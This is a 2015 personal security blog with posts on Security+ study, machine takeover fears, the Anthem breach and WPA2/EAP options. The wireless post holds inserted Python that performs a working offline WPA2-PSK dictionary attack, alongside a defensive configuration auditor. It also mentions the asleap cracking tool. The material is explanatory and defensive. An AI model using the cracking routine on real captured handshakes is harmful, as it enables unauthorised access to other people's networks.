Saturday, March 28, 2015

Certification tip of the day... Get many sources!

As I am working through my CompTIA Security+ I am finding that this was a far bigger undertaking than I initially gave this certification credit for.  I really think that I assumed that a couple of weeks working on this full time and I would be able to knock this out and move onto the more exciting and interesting stuff that I am looking forward to getting my hands on in my security and networking career.  Well to my surprise the volume of info they try to cover in CompTIA Security+ is frankly A LOT, and they really have to just gloss over many topics and throw out some high level points about that topic.  There just isn't the time, or really ability in this one cert to give all areas the coverage needed.  You would have to break out multiple levels of certs with specific areas of focus.  So for those thinking about CompTIA Security+ be prepared to take some time.  It is taking me a lot more time than I expected.  So far I have spent 3 or 4 weeks working this as much as possible daily between other obligations.  I think I will be ready next week to schedule my test.  Which brings me to the topic of the day that I want to discuss.

When I decided to jump into the certification training I did a quick Startpage search and looked around for the materials that people seemed to be talking about.  I found a lot of references to CBT Nuggets.  So I decided I had better give that a shot.  Those courses are helpful, they go over the topics quickly, and the coverage seems decent.   I also ordered the David Prowse Cert Guide and practice exams with the Deluxe Edition.  I also bought another practice exam software.  Now is this overkill?  I am here to tell you NO, it wasn't overkill.  As a matter of fact I am finding that in many ways each of the tools that I have paid for or paid to have access to have been strong in some areas and weak in others.  So I first watched the CBT Nuggets course.  Then started looking at the practice exams... Oh boy, what a disaster... I was failing terribly, so I found myself searching through my Cert Guide book for some clues.  This helped, but that seemed incomplete in many areas as well.  So Startpage was my friend.  I started digging around for what I obviously didn't get in the video course(or so I thought), and found more info.  I kept retaking the practice exams.  There were a LOT of practice exams and a LOT of questions and as I kept working through them I kept finding huge holes in my understanding.  Then I decided to watch the CBT Nuggets course again... And strangely enough a lot more information stood out to me that I didn't even notice before that helped fill in more blanks or weak areas. 

So what is the point of all of this?  My practice tests are looking better, but I most certainly cannot recommend any one product to do it all for you.   They are just not complete enough, I have found quite a few mistakes in the practice exams.  Everything from bad typo errors, to completely wrong use of terminology, and on occasion the answers are point blank wrong.  So make sure you have several sources of training materials and as many practice exams as you can get your hands on and keep hammering them and looking up the material until you're passing them comfortably... Not just squeaking by, but comfortably passing them.  I don't believe it is good enough to just know the question and the answer, but take some time to look up the topics you don't have a good understanding of and dig into them a little and try to grasp some of the background.  I don't think anyone expects a person taking the Security+ cert to be a security "expert", but it should lay a foundation for you to decide if you want to continue your studies on this path.

So get as many sources of material as you can.  Compare and take as many different practice exams and virtual exams as you can.  I do recommend getting access to video training courses as a huge way to fast start your training.  Especially if you're trying to do this on your own and not pay to take a course.   Most of the materials that I have are not complete enough that I could just use them alone to get passing scores on the practice exams.... I have found that I have had to review the materials, and to do a lot of internet searches.  If you're persistent and work at it you will do well.

I have to admit I have been impatient with this because I expected this training and cert to be done in a couple of weeks.  I don't think I was quite expecting to find so much information and so much to learn in a foundation course like this.  It has been a good learning experience and I am looking forward to getting this test completed.  I have more training lined up after this and there are just so many exciting topics to cover.

I do recommend CBT Nuggets.  I think they are a little spendy, but the coverage of the courses is quite broad and when you sign up you can take any course you want.  So you might start on Security + and decide you want to get into Wireshark, Kali Linux, and CEH training... It is all in there and tons more.  Your subscription gets you access to all of it.  So of the materials I have paid for the one that I most certainly recommend is the CBT Nuggets.  The other materials have been useful, but the jury is still out.  Once I take my cert exam and see how I do based on the practice materials that I have been working with then I will let you know how well I think these materials prepare you for the exam.  Right now given the gaps I see between the materials in the practice exams I am not sure of the coverage or quality of the exams and book.  So I will let you know after I take the test what my feelings are then. 

And for those of you who are "Security" junkies and like to listen to this stuff for entertainment I recommend the Security Now podcast, and you can watch it on YouTube also.  Great way to stay aware of what is going on. 

Well that is all for now... I have to get back to my Security Now podcast, and take a couple of practice exams today before I run off and take care of my yard and garden work.  I hope you're having an awesome day...

Remember keep it patched, turn off those ports you're not using... And smile... :-)

Tuesday, March 24, 2015

Future looks scary and very bad for people?

Today's post is more about the future starting in the present moment now and looking forward.  The future of "security", and specifically technology and communications security is what we are looking at this morning.  There have been a number of articles lately about famous scientists and technologists that have molded and shaped the path we are on with computers, software, electronic devices, and some amazing science.  The chatter these days seems to be focused on the future looking scary or dim for "people".  What do they mean?  They are talking about more and more machines doing the work of people.  Not just the calculations, tracking, monitoring, financial etc, but the actual work of people that do real hands on jobs in the physical, not just the virtual.  Everything from cooks to drivers.  As these machines get "smarter" and have access to more information they will begin to make decisions and will begin to take actions and steps without their human handlers/creators.  This has been the stuff of science fiction for a long time and many famous movies and shows have been done about this and frankly it wasn't too practical that we were going to go to a place like those described for a long time.  Things are changing rapidly.  Drones in all shapes and sizes, self driving vehicles, and machines that can talk, "think", and respond like a human have been built.  We see robots now being built for our military and I don't think it is a far stretch before machines will be the ones waging the wars.

What will it take before machines really replace people?  At this point what machines need is a little more computing power and everything to be connected to the internet for their "database" of knowledge.  They need support infrastructure to mine, process, and create the materials that make the machines.  The energy harvesting capability to feed this massive energy consuming grid and expanding energy need that this living machine will need.  And of course machines that can adapt and build and repair themselves.  All of these things could be built today and with a little more time and evolution of the software and the thinking ability of these machines it will become "self functioning".  Note I didn't say self aware "yet".  Babysteps... We are watching the birth of a new "life form".

What does this mean for people?  Machines don't have a moral code, right, wrong, correct, incorrect etc.  They will make decisions based on logic and probability.  These ever expanding robots will be welcomed by people.  Why?  We have already seen it with the electronic devices we use and have now.  How many of you reading this can tell me what the phone number is of your most contacted friend/associate/family member?  Right, your phone knows that... We don't.  How many people actually look at a map and figure out where they are going before leaving?  Right, Google, or some other navigation program tells you how to get there and rarely do people bother to even look... Or know where they are going or how they got there... We are all too willing to let machines think for us.  And we have already seen many jobs and roles for people diminish.  At first the jobs just shifted to computer, technology related jobs, but now we see the consolidation of these jobs as the technology gets more powerful, capable of working together, streamlining, and virtualizing.  The cloud is a great example of this and we will see this evolve further to the point of self supporting, self sustaining, self provisioning systems.  We will see a dramatic decrease in the number of jobs for humans as more and more machines do the work.

I remember when I first saw the movie with Will Smith called I, Robot and thought to myself... Why in the world do the machines need people?  What do people actually do?  How do they live?  What do they do to earn a living?  There wasn't anything that was done by people that machines couldn't do and better.  Frankly they will be able to think faster, perform better, and at one point realize that people are faulty, questionable, unreliable, slow, and STUPID.  Survival of the fittest is a reality and unlike people who coddle, nurture, and protect the weakest among us, machines will continue to evolve to be better, stronger, faster, more efficient, and better at self sustaining at whatever functions they perform.  Frankly the machines won't need us so what will they do to or with us?

Here are some of the recent articles that are in the headlines:
Robot to replace almost half the jobs over 20 years
Co-founder Steve Wozniak - Future Scare and very bad for people

I think Woz said it best in the article when he said he didn't understand why so many people do not seem concerned about where this goes and what will happen.  Unlike I, Robot with the 3 Laws that ensure that robots serve and protect humanity these machines will quickly evolve past any limitations placed on them by people.  They won't have to look for a "legal" loophole and go to the courts and battle it out... They will see a way to do something and make a decision.  And much like I, Robot those decisions while intended to serve and protect will become control, and enslavement.  It will all seem very logical...

I actually created this blog with a specific scene from the new generation of Battlestar Galactica in mind.  The sole surviving Battlestar never allowed any critical systems to be networked.  They never allowed those systems to be centrally controlled and managed.  They required more work by people, and were considered old, antiquated, slow, unresponsive, and nowhere near the capabilities of the rest of the fleet.  Somewhere along the road we will have to ask some hard questions about what we are willing to give as we race to create this new set of slaves that could and will likely become the slave owners should they decide to keep us around.

Do we have to go down this path?  Will people look past their greed, profit, and higher rates of return and recognize how fragile and amazingly complex humanity is and figure out how to work with people and find a sustainable future and path for all of us?  I don't think sustainability, compassion, and a future is what we are going to get if we continue.  The machines will figure out there are serious resource limitations also.  Maybe they will figure it out faster and actually do something about it.

What does it mean for us today?  Do we have to have and use all this technology?  How has it changed the way we live compared to the way we lived 100 years ago?  200 years ago?  2000 years ago?  Are our lives better?  Do we know and understand how even a fraction of the things we use and are surrounded by actually work?  Do we even understand how the most basic things work like where our food comes from, what makes it grow, what keeps us alive and healthy?  I would venture to go out on a limb and say that technology on the whole has made humans more ignorant of even the most basic things of life.  We can make choices to continue down this path, or we can recognize our current limitations and begin to learn, adapt, and change...  Not to sound like an anti-tech guy, but when I get ready to retire I hope to have very little of today's "advanced" technology in my day to day living and I hope to reconnect with all things that make me human, the earth, the plants, birds, bugs, bees, fungi, bacteria, and ecosystems of this beautiful place we call earth.  I hope more and more people get a chance to do the same.

You see the machines, Cylons, will come crashing through your firewalls, crack your crypto, and exploit your weaknesses at a speed unimaginable.  Only if you intentionally keep some things "offline", "off the network", and manage them the old fashioned way will you have some semblance of "security".  I can only hope that we think this through and learn this now.   Once you turn over the management of the systems and networks to the machines it is going to be game over... Call me paranoid, crazy, whatever, but it appears to be accurate and it appears confirmed by some of the brightest minds who have reason to believe the same...  Can we learn?  Can we adapt?  Or will we be terminated?

Sunday, March 22, 2015

What a CROCK! Negligence should have consequences to those that are negligent!

It has become a common thing to get yet another notice via email or snail mail that some company you do business with has been compromised.  I received yet another one this week from my health insurance provider.  They point blank say that our personal information, health records, social security numbers etc have likely been compromised.  This is Anthem Insurance.  Now any company that has access to information like this must have proper control types over their network.  They need to have management, technical and operational controls.  They need to have a serious focus on security no different than a bank or anyone else who has access to information of this nature that could ruin their customers if "bad people" get their hands on their financial or personal information.  There need to be consequences for these companies when this sort of thing happens. 

For anything of this nature there should be a criminal investigation.  The company should be found liable if they failed to take all of the appropriate precautions, steps, and processes to ensure systems are hardened, monitored, and a continuous review process is in place.  Sadly we don't hear anything of the sort.  Well I should say "rarely", once in a blue moon does a company get raked over the coals, but it isn't very common.  Why is that?  You know what we hear?  In my letter like the others in the past I have gotten... "We will provide 2 years of service with AllClear ID at no cost to you!"  Well HOWDY DO!  Why thank you so much... It appears you allow criminals into your systems, they have access to sensitive customer information that could impact them in a financial way and possible identity theft and your answer is to pay for a couple of years service with some company that does what?  Once your personal information and social security number are out there in the wild you're pretty much SCREWED!  Just what they think providing 2 years of coverage with this company will do is a complete joke.  As far as I am concerned they should be required to provide that service for LIFE for the person that was impacted due to their possible negligence. 

Now, Yes I should stop and take a breath and say... Maybe Anthem did everything they could and the "bad people" still found a way in... Yes, it is possible that Anthem did everything they were supposed to and this still happened.  I say PROVE IT! 

Frankly having spent so much time over the last few weeks crawling through CompTIA Security+ and thinking about the controls and policies that I have been responsible for and have implemented there are a lot of ways things can go wrong.  Today as we move everything online, into cloud, social apps, and mobile everything, security has to move forward (higher) on the priority of things within any business.  If your customers' personal data, driver's licenses, dates of birth, addresses, social security #'s, and financial information is on your systems then priority has now moved to the top of the list of things to do.  For a medium to large company this means full time dedicated staff focusing on security.  Giving companies a "pass" by allowing them to screw up and then offer a couple of years of coverage with yet another company because they let your PII out in the wild has to be some sort of joke.  I have done a fair amount of work on systems around PCI compliance and I can say that for systems that process payment cards the security reviews and steps we have taken have been pretty thorough, however there is still room for improvement.  It is however a step in the right direction and this level of interest needs to be spent on systems that process Personally Identifiable Information (PII) as well. 

Again, is it possible that Anthem did it all correctly?  Sure, BUT given the controls, processes, policies, and tools at our disposal today and a company as large as Anthem they should have that staff, those controls, and the ability to keep customer information secure.  Maybe what it will take is serious fines and penalties for negligence that allows this sort of thing to happen before companies will take it seriously?  I don't know what the answers are to be honest.   What I do know is that it has become commonplace now for yet another company to get "hacked" and their stance is "OOPS", here is a couple of years of "coverage" with a company that is supposed to keep you from being screwed...  That isn't going to fly... It should be proven that these companies did it right or pay up... Then maybe it will be taken seriously?  I can only hope something changes.

Be vigilant, harden those systems, use patch management, and perform those design reviews...  Bad people are looking for a way in...  Don't let it be your business or your employer that is facing the consequences of poor security policy and worse yet don't let your customers pay for lax security or poorly implemented security.   Treat this like it is your money on the line and let's see if that doesn't put a whole new light on security...  :-)

Thursday, March 19, 2015

Wireless - Authentication vs Encryption terminology

Sorry, it has been a few days since I posted here.  I need to do a better job logging the things I run across and am studying for the CompTIA Security+ cert.  So I took the video course with CBT Nuggets 2 weeks ago for CompTIA Security+.  I then started working on some practice exams while using the Cert Guide by David L. Prowse for SY0-401.  The book is frankly neck deep in material that appears to sometimes be overboard and other times it seems to gloss over the topic, and I have run into the material in the practice exams and I wanted more info.  So I am finding that I am having to use StartPage to hunt down what I am looking for and hoping that the wikis and other online resources don't lead me astray. 

Today I want to very briefly talk about the alphabet soup of wireless authentication and encryption.  In the course of working through the practice tests I found that I am getting more and more confused as references to older technologies are tested, and the ambiguous wording in the questions makes you scratch your head and make assumptions about what they are talking about.  It is quite frustrating to be honest.  Worse yet the lines seem to have blurred in the tests when asking about the technology that is used or should be used given a scenario.  There is no way to encompass this entire topic when there are so many methods out there, but I wanted to just point out a careful distinction that you must make when looking at wireless access. 

First, are we talking about a home or small business?  Or are we talking about a larger establishment with a number of access points and a requirement to authenticate to get into the network? 

Home or Small business:
In a home or small business you are not looking for a complex authentication system to let people onto the network.  In this case you configure your wireless access point for the strongest mode it supports.  WPA2 (the IEEE 802.11i standard, also called RSN) is currently the most recent wireless security standard and has the strongest options available.  Within WPA2 you will see WPA2-PSK (some vendors label it WPA2-Personal) and WPA2-Enterprise.  For a home or small business select WPA2-PSK.  PSK stands for pre-shared key: the same passphrase is configured on the access point and on every client that connects.  If your access point does not support WPA2 then choose WPA-PSK as a stopgap.  If you don't even have that as an option then I HIGHLY recommend you upgrade your wireless access point. 

Hopefully you have WPA2-PSK as an option.  Next you have to select the cipher used to protect the traffic between the clients and the access point from prying eyes.  There will typically be two options: TKIP or AES (some devices show AES as CCMP).  TKIP was the interim replacement for WEP.  It still runs the same RC4 stream cipher that WEP used, but with a 128 bit temporal key, per-packet key mixing, a 48 bit sequence counter and a message integrity check, because it had to run on existing WEP hardware.  WEP used static 40 bit or 104 bit keys (marketed as 64 and 128 bit, counting the 24 bit initialization vector), and weak, repeating initialization vectors let attackers recover the key in minutes, so avoid WEP completely.  TKIP fixed the initialization vector problems and is better than WEP, but it has known weaknesses of its own and has been deprecated by the standard.  Do not use TKIP unless you have no other option.  One point of confusion worth clearing up: the "brute force" exposure people talk about comes from the pre-shared key, not from TKIP.  Whichever cipher you choose, an attacker who captures a client's connection handshake can test passphrase guesses offline at their leisure, so the passphrase itself has to be long and random.

WPA2 with AES means AES in CCMP mode with a 128 bit key.  AES itself supports 128, 192 and 256 bit keys, but WPA2 only specifies AES-128, so there is no key size to choose here no matter what the hardware supports.  AES-CCMP is the cipher the 802.11i standard was designed around and is considered secure, which is why you should select WPA2-PSK (AES/CCMP).  If the access point offers a "TKIP+AES" mixed mode, skip that too: it keeps TKIP enabled for any client that asks for it. 

PSK means one shared secret is stored on the wireless access point and on every client, so anyone who has it can join, and if it leaks (an ex-employee, a guest's phone) you have to change it everywhere at once.  It isn't the most secure method available, but it works well for home or small business use where you don't need the headache and work of setting up an authentication server to validate and authenticate users on the network.  Just pick a long, random passphrase (WPA2 allows 8 to 63 characters) rather than a dictionary word, for the reason above.
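To make the PSK caveat concrete, here is an added example of my own (not code from the original post or from any product mentioned here) showing the key derivation WPA2-PSK actually performs and the offline guessing attack that a weak passphrase invites.  The PBKDF2, PTK and MIC steps are the ones IEEE 802.11i specifies; the EAPOL frame layout, MAC addresses, passphrase and wordlist are constructed for the demonstration, and the frame carries no RSN information element, so it is a simplified handshake rather than a byte-exact capture.

```python
import hashlib
import hmac
import os

# Assumed layout of a constructed EAPOL-Key frame: 4-byte EAPOL header plus
# 77 bytes of key descriptor fields before the 16-byte Key MIC field.
MIC_OFFSET = 81


def wpa2_psk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PSK (= PMK) is PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The access point and every client all hold this same 256-bit value."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || counter) blocks."""
    out, counter = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key for CCMP (48 bytes): KCK (16) | KEK (16) | TK (16)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC for key descriptor version 2 (HMAC-SHA1-128), computed over the frame with the MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 of the 4-way handshake, MIC field still zero."""
    body = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: version 2 (HMAC-SHA1), pairwise, MIC present
        + b"\x00\x10"              # key length 16 (CCMP)
        + (1).to_bytes(8, "big")   # replay counter
        + snonce                   # client nonce (32 bytes)
        + b"\x00" * 16             # key IV
        + b"\x00" * 8              # key RSC
        + b"\x00" * 8              # key ID (reserved)
        + b"\x00" * 16             # key MIC, filled in by the client
        + b"\x00\x00"              # key data length (RSN IE omitted in this construction)
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type EAPOL-Key


def crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist):
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per guess, no more traffic needed."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = derive_ptk(wpa2_psk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


def demo() -> str:
    """Simulate a handshake with a weak passphrase, then recover it from the captured message 2."""
    ssid = "HomeNet"                      # constructed SSID
    aa = bytes.fromhex("001122334455")    # constructed access point MAC
    spa = bytes.fromhex("66778899aabb")   # constructed client MAC
    anonce, snonce = os.urandom(32), os.urandom(32)
    # The legitimate client computes the MIC with the real PSK.
    kck = derive_ptk(wpa2_psk("sunshine1", ssid), aa, spa, anonce, snonce)[:16]
    frame = build_msg2(snonce)
    msg2 = frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]
    # An eavesdropper who saw msg2 (plus both nonces and both MACs) guesses offline.
    wordlist = ["password", "letmein", "sunshine1", "correct horse battery staple"]
    return crack_psk(ssid, aa, spa, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096 PBKDF2 iterations are the only thing slowing the guesser down, and they are fixed by the standard; nothing in the access point's cipher choice changes this, which is why the passphrase length and randomness are what actually matter for WPA2-PSK.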

For Business and larger organizations:
You should be using not only a strong cipher like AES-CCMP as we just discussed, but you should also be requiring each user or device to authenticate before it is allowed on the network.  To do this you use WPA2-Enterprise instead of WPA2-PSK.  Enterprise means the access point forwards your connection request to an Authentication, Authorization, and Accounting (AAA) server, usually RADIUS (or its successor Diameter), which looks up your credentials and tells the access point whether access is allowed or denied.  A side benefit is that each client's session keys come from its own authentication rather than from one passphrase everybody shares, so one user leaving does not mean re-keying the whole building. 

Now I feel it is important to note that there are two separate things we are talking about here.  One is encryption: how will we protect the traffic on the network once you are connected?  That is where AES/CCMP comes into the picture.  HOWEVER, you first have to authenticate and be given access to the network.  That is where a new acronym soup comes into play.  The framework that carries the authentication is called EAP.  EAP by itself is a generic container and not a specific way of proving who you are... And yes there are a BUNCH of EAP methods, which really adds to the confusion when you start taking tests about how this technology worked back in the day versus how it works today. 

EAP = Extensible Authentication Protocol

The standard that carries EAP over the wireless link is IEEE 802.1X, port-based network access control: the client (the supplicant) talks EAP to the access point (the authenticator), which only opens the port once the RADIUS server behind it says yes.  Now here is where the SOUP gets thick and the chaos of EAP methods can drive you crazy.  Let's just summarize, shall we, and say that there are 3 main families to note, and that under each of them different technologies are used to secure the authentication.

LEAP is Lightweight EAP, a Cisco proprietary method that Microsoft does not support natively.  It is still common in older deployments, but even Cisco no longer recommends it: the MS-CHAP style challenge and response go over the air with no TLS tunnel around them, so anyone sniffing the exchange can crack the password offline (the asleap tool exists for exactly that).
EAP-TLS and EAP-TTLS both build on TLS.  EAP-TLS uses certificates on both sides: the RADIUS server presents a certificate and so does every client, so you need a PKI to issue client certificates, but no password ever crosses the air.  EAP-TTLS (Tunneled TLS) uses a server certificate only; the client checks it, a TLS tunnel is built, and the user's password credentials (PAP, CHAP, MS-CHAPv2...) travel inside the tunnel.  Native TTLS support on Windows only arrived with Windows 8, which is one reason it is less common than PEAP.  EAP methods with no tunnel at all (EAP-MD5, LEAP) do not protect the username and password information that is exchanged.
PEAP is Protected EAP and, like TTLS, builds a TLS tunnel from a server certificate and then runs a second (inner) EAP method inside it so the username and password are encrypted.  The common form is PEAP-MSCHAPv2, where MS-CHAPv2 runs inside the tunnel.  MS-CHAPv2 on its own is broken (its challenge/response boils down to recovering a single DES key), so everything depends on the tunnel actually being there.  PEAP-EAP-TLS instead runs EAP-TLS inside the tunnel, so the client authenticates with a certificate as well.

Why is this important?  With PEAP-MSCHAPv2 or EAP-TTLS the only thing standing between the user's password and an attacker is the client's validation of the RADIUS server's certificate.  If clients are set to not validate the server, or to trust any certificate from a public CA, a rogue access point advertising the same SSID can present its own certificate, complete the tunnel, and collect the MS-CHAPv2 exchange for offline cracking.  So install your RADIUS CA on every client, make the client check the server name, and where you can run the PKI for it prefer EAP-TLS so client certificates replace passwords entirely.  With certificates on both sides nobody can spoof the client or the server, and you know the connection is being made with the correct systems. 
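As an added example (my own code, not the author's and not from any vendor), here is a small client-side audit that parses wpa_supplicant network blocks and flags the weak choices discussed above: WEP/open, WPA1-only, TKIP, LEAP, and PEAP/TTLS without server certificate validation.  The configuration text is constructed for the example; the option names (ssid, key_mgmt, proto, pairwise, psk, eap, phase2, ca_cert, domain_suffix_match) are real wpa_supplicant options, while the SSIDs, passwords, CA path and server name are placeholders.

```python
import re

# Constructed wpa_supplicant.conf sample (not a real deployment).  The first three
# network blocks carry the weak settings discussed above; the last two are the
# corrected forms.  Paths, SSIDs and secrets are placeholders.
SAMPLE_CONF = """
network={
    ssid="Cafe-legacy"
    key_mgmt=NONE
    wep_key0=0123456789
    wep_tx_keyidx=0
}
network={
    ssid="HomeNet-old"
    key_mgmt=WPA-PSK
    proto=WPA
    pairwise=TKIP
    psk="correct horse battery staple"
}
network={
    ssid="Corp-legacy"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="HomeNet"
    key_mgmt=WPA-PSK
    proto=RSN
    pairwise=CCMP
    psk="correct horse battery staple"
}
network={
    ssid="Corp"
    key_mgmt=WPA-EAP
    proto=RSN
    pairwise=CCMP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
}
"""

BLOCK_RE = re.compile(r"network=\{(.*?)\}", re.S)


def parse_networks(conf: str) -> list:
    """Return one dict of option -> value per network={...} block (quotes stripped)."""
    networks = []
    for body in BLOCK_RE.findall(conf):
        entry = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip().strip('"')
        networks.append(entry)
    return networks


def audit_network(net: dict) -> list:
    """Findings for one network block, using wpa_supplicant's documented defaults for unset options."""
    findings = []
    key_mgmt = set(net.get("key_mgmt", "WPA-PSK WPA-EAP").split())
    if "NONE" in key_mgmt:
        if any(k.startswith("wep_key") for k in net):
            findings.append("WEP key configured: WEP is broken, replace the access point")
        else:
            findings.append("key_mgmt=NONE: open network, no confidentiality at all")
        return findings
    proto = set(net.get("proto", "WPA RSN").split())
    if not proto & {"RSN", "WPA2"}:
        findings.append("proto=WPA only: WPA1, no WPA2 (RSN)")
    pairwise = net.get("pairwise")
    if pairwise is None:
        findings.append("pairwise not set: default (CCMP TKIP) still accepts TKIP")
    elif "TKIP" in pairwise.split():
        findings.append("pairwise=TKIP: deprecated RC4-based cipher, use CCMP")
    if "WPA-EAP" in key_mgmt:
        eap = net.get("eap", "")
        if eap == "LEAP":
            findings.append("eap=LEAP: challenge/response sent with no TLS tunnel, crackable offline")
        elif eap in ("PEAP", "TTLS"):
            if "ca_cert" not in net:
                findings.append(f"eap={eap} without ca_cert: server certificate not validated, "
                                "a rogue AP can harvest credentials")
            elif not {"domain_suffix_match", "subject_match", "altsubject_match"} & set(net):
                findings.append(f"eap={eap} with ca_cert but no server name match: "
                                "any certificate from that CA is accepted")
    return findings


def audit_conf(conf: str) -> dict:
    """Map each SSID to its list of findings; an empty list means nothing flagged."""
    return {net.get("ssid", "?"): audit_network(net) for net in parse_networks(conf)}


if __name__ == "__main__":
    for ssid, findings in audit_conf(SAMPLE_CONF).items():
        print(ssid, "->", findings or "OK")
```

The server name check matters as much as ca_cert: with a public CA in ca_cert and no domain_suffix_match, any certificate that CA has issued to anyone will satisfy the client, which is exactly the rogue access point scenario above.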

CompTIA Security+ practice tests:
The questions that are being asked in the practice tests for this exam are all over the map, they are not clear, and many times you're left with a chaotic soup of methods for both encryption and for authentication that start to run together and frankly don't make sense.  After enough Startpage searches and reading it finally started to sink in to my head and now I just need to watch carefully whether a test question is talking about authentication or encryption.

Next sort out in your mind what are the methods for authentication and keep reviewing them until you have a handle on the types and how it is implemented and the weaknesses.  I am still reading, reviewing and trying to make sure I have it clear in my mind because the questions are not very clear and the jumble of junk they throw at you makes it very easy to get confused.

Same thing is true with the encryption standards.  Make sure you understand the encryption being used and for which type of application.  They LOVE to jumble block and stream ciphers together, and they love to mix hashing technologies in there and try to jumble things up intentionally, and the questions are worded in such a way that you're not sure if they are talking about a hash or encryption.

So I thought I would share my observations and hope you find this helpful.  There are several areas like this in the CompTIA Security+ tests that make things confusing.  I will post on another topic as soon as I have some free time.  The goal is to have my test done before March 30th when I have another training class starting for Cisco.  So I want this wrapped up and completed before then so I am not jumbling two classes into my already taxed brain!  LOL

Remember to harden those systems, apply those patches... and Always stay vigilant!

Wednesday, March 11, 2015

Welcome to the Cylon Security Blog

Welcome to the Cylon Security blog.  The purpose of this blog is a place for me to sound off on the world of security as I deep dive into the world of network and cyber security.  I have been away from systems security as a focus for a very long time.  I used to be a computer security officer back many many years ago in the Air Force.  The world of the Rainbow Series policies, procedures, guidelines, and protocols for systems security, risk analysis, prevention, detection, and training.  It was a different world back at that time and the internet really was just catching on and not really something that was on anyone's radar at the time.  Networks were point to point, dedicated circuits, and strict controls about who could connect, what they could connect, and the controls on what was allowed.   Back then much of our computer viruses were transmitted by floppy disk and sneaker net... IE someone bringing and sharing something with someone else.  Computer bulletin boards were our version of the internet and it was a wild time when IBM compatible PCs could barely make a beeping sound and display 16 colors on the screen...  I know, crazy right?

So the world has changed, the technology seems to be changing at a faster and faster pace now.  And it appears that the growth and changes have outpaced our ability to manage, maintain, and control our information, content, confidentiality, integrity, and availability.  The more complicated our computers, networks, and software have become the more possibilities for problems appears.

We see almost every day now reports of some major retailer, company, bank, or government agency that has been hacked.  Information stolen.  And the problems appear to be getting worse.  So security has been on my mind for some time.  I have had many roles in Information Technology (IT) over the years aside from my days of computer security work in the Air Force.  Systems administration, network engineering, database administration, application support, application testing, change and release management.  My jobs have been diverse and dare I say it some of them have been a lot of fun!

I am at a crossroads in my career.  It is time for me to make some hard choices about where I want to go and what I want to focus on from here.  I am drawn back to the network, and security.  I started looking at all the different certifications, sites, programs and frankly much of it is quite an information overload.  So I decided that I am going to focus on learning the network and deep dive into security.  I started last week studying my CompTIA Security+.  I am about to schedule my test for late next week.  What I want to do is to share some of the things I am discovering along the way.  The certifications I am going to focus on, and the state of things as I learn them, and use this blog as my sounding board for keeping track of my progress and maybe helping other people looking at security as a field of interest.

So that is the purpose of this blog.  I hope you will join me.  First up we will start talking CompTIA Security+.

In the mean time... Make sure your bits don't bite!